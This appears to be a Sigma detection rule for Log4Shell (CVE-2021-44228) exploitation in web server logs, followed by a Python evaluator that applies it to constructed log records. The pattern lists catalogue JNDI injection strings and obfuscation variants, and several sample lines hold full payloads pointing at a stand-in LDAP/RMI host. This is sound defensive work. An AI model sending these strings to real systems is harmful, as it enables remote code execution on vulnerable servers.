Log4j RCE CVE-2021-44228 in Fields
Detects exploitation attempt against log4j RCE vulnerability reported as CVE-2021-44228 in different header fields found in web server logs (Log4Shell)
Sigma rule

title: Log4j RCE CVE-2021-44228 in Fields
id: 9be472ed-893c-4ec0-94da-312d2765f654
status: test
description: Detects exploitation attempt against log4j RCE vulnerability reported as CVE-2021-44228 in different header fields found in web server logs (Log4Shell)
references:
    - https://web.archive.org/web/20231230220738/https://www.lunasec.io/docs/blog/log4j-zero-day/
    - https://news.ycombinator.com/item?id=29504755
    - https://github.com/tangxiaofeng7/apache-log4j-poc
    - https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b
    - https://github.com/YfryTchsGD/Log4jAttackSurface
    - https://twitter.com/shutingrz/status/1469255861394866177?s=21
author: Florian Roth (Nextron Systems)
date: 2021-12-10
modified: 2023-01-02
tags:
    - attack.initial-access
    - attack.t1190
    - cve.2021-44228
    - detection.emerging-threats
logsource:
    category: webserver
detection:
    selection1:
        cs-user-agent|contains:
            - '${jndi:ldap:/'
            - '${jndi:rmi:/'
            - '${jndi:ldaps:/'
            - '${jndi:dns:/'
            - '/$%7bjndi:'
            - '%24%7bjndi:'
            - '$%7Bjndi:'
            - '%2524%257Bjndi'
            - '%2F%252524%25257Bjndi%3A'
            - '${jndi:${lower:'
            - '${::-j}${'
            - '${jndi:nis'
            - '${jndi:nds'
            - '${jndi:corba'
            - '${jndi:iiop'
            - 'Reference Class Name: foo'
            - '${${env:BARFOO:-j}'
            - '${::-l}${::-d}${::-a}${::-p}'
            - '${base64:JHtqbmRp'
            - '${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}$'
            - '${${lower:j}ndi:'
            - '${${upper:j}ndi:'
            - '${${::-j}${::-n}${::-d}${::-i}:'
    # selection2:
    #     user-agent|contains:
    #         - '${jndi:ldap:/'
    #         - '${jndi:rmi:/'
    #         - '${jndi:ldaps:/'
    #         - '${jndi:dns:/'
    #         - '/$%7bjndi:'
    #         - '%24%7bjndi:'
    #         - '$%7Bjndi:'
    #         - '%2524%257Bjndi'
    #         - '%2F%252524%25257Bjndi%3A'
    #         - '${jndi:${lower:'
    #         - '${::-j}${'
    #         - '${jndi:nis'
    #         - '${jndi:nds'
    #         - '${jndi:corba'
    #         - '${jndi:iiop'
    #         - 'Reference Class Name: foo'
    #         - '${${env:BARFOO:-j}'
    #         - '${::-l}${::-d}${::-a}${::-p}'
    #         - '${base64:JHtqbmRp'
    #         - '${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}$'
    #         - '${${lower:j}ndi:'
    #         - '${${upper:j}ndi:'
    #         - '${${::-j}${::-n}${::-d}${::-i}:'
    selection3:
        cs-uri-query|contains:
            - '${jndi:ldap:/'
            - '${jndi:rmi:/'
            - '${jndi:ldaps:/'
            - '${jndi:dns:/'
            - '/$%7bjndi:'
            - '%24%7bjndi:'
            - '$%7Bjndi:'
            - '%2524%257Bjndi'
            - '%2F%252524%25257Bjndi%3A'
            - '${jndi:${lower:'
            - '${::-j}${'
            - '${jndi:nis'
            - '${jndi:nds'
            - '${jndi:corba'
            - '${jndi:iiop'
            - 'Reference Class Name: foo'
            - '${${env:BARFOO:-j}'
            - '${::-l}${::-d}${::-a}${::-p}'
            - '${base64:JHtqbmRp'
            - '${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}$'
            - '${${lower:j}ndi:'
            - '${${upper:j}ndi:'
            - '${${::-j}${::-n}${::-d}${::-i}:'
    selection4:
        cs-referer|contains:
            - '${jndi:ldap:/'
            - '${jndi:rmi:/'
            - '${jndi:ldaps:/'
            - '${jndi:dns:/'
            - '/$%7bjndi:'
            - '%24%7bjndi:'
            - '$%7Bjndi:'
            - '%2524%257Bjndi'
            - '%2F%252524%25257Bjndi%3A'
            - '${jndi:${lower:'
            - '${::-j}${'
            - '${jndi:nis'
            - '${jndi:nds'
            - '${jndi:corba'
            - '${jndi:iiop'
            - 'Reference Class Name: foo'
            - '${${env:BARFOO:-j}'
            - '${::-l}${::-d}${::-a}${::-p}'
            - '${base64:JHtqbmRp'
            - '${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}$'
            - '${${lower:j}ndi:'
            - '${${upper:j}ndi:'
            - '${${::-j}${::-n}${::-d}${::-i}:'
    condition: 1 of selection*
falsepositives:
    - Vulnerability scanning
level: high
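To see how the rule's three `contains` selections and its `1 of selection*` condition behave against the fields it names, here is an added Python evaluator; it is not part of the rule or of the SigmaHQ project. The W3C log parser, the constructed sample lines and the function names are assumptions for this illustration; the indicator strings are the rule's own.

```python
# Added example: applies the rule's selections to constructed W3C-style web server records.
INDICATORS = [  # copied from the rule; all three active selections share this list
    '${jndi:ldap:/', '${jndi:rmi:/', '${jndi:ldaps:/', '${jndi:dns:/',
    '/$%7bjndi:', '%24%7bjndi:', '%2524%257Bjndi', '%2F%252524%25257Bjndi%3A',
    '${jndi:${lower:', '${::-j}${', '${jndi:nis', '${jndi:nds', '${jndi:corba',
    '${jndi:iiop', 'Reference Class Name: foo', '${${env:BARFOO:-j}',
    '${::-l}${::-d}${::-a}${::-p}', '${base64:JHtqbmRp',
    '${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}$', '${${lower:j}ndi:',
    '${${upper:j}ndi:', '${${::-j}${::-n}${::-d}${::-i}:',
]
# Each active selection checks one W3C (IIS-style) field against the list above.
SELECTIONS = {"selection1": "cs-user-agent", "selection3": "cs-uri-query",
              "selection4": "cs-referer"}

def parse_w3c(lines):
    """Parse W3C extended log lines; the '#Fields:' directive names the columns."""
    fields, records = [], []
    for line in lines:
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#"):
            records.append(dict(zip(fields, line.split())))
    return records

def matched_selections(record):
    """Selections whose field contains an indicator; Sigma matches case-insensitively."""
    hits = []
    for name, field in SELECTIONS.items():
        value = record.get(field, "").lower()
        if any(ind.lower() in value for ind in INDICATORS):
            hits.append(name)
    return hits

def evaluate(lines):
    """'condition: 1 of selection*': alert on every record where at least one fires."""
    alerts = []
    for record in parse_w3c(lines):
        hits = matched_selections(record)
        if hits:
            alerts.append((record.get("cs-uri-stem", "-"), hits))
    return alerts

# Constructed sample log (not real traffic); '-' marks an empty W3C field.
SAMPLE_LOG = [
    "#Fields: date time cs-method cs-uri-stem cs-uri-query cs-user-agent cs-referer sc-status",
    "2021-12-10 12:00:01 GET /index.html - Mozilla/5.0 - 200",
    "2021-12-10 12:00:02 GET /login q=${jndi:ldap://example.invalid/a} curl/7.68.0 - 200",
    "2021-12-10 12:00:03 GET /api/v1 - ${${lower:j}ndi:ldap://example.invalid/x} - 404",
    "2021-12-10 12:00:04 GET /search q=hello Mozilla/5.0 ${JNDI:RMI://example.invalid/y} 200",
]
```

In production the rule is compiled for a SIEM by a Sigma backend; this stand-alone evaluator only mirrors the matching semantics so the indicators and condition can be sanity-checked against sample records, including the upper-case variant in the last line that case-insensitive matching still catches.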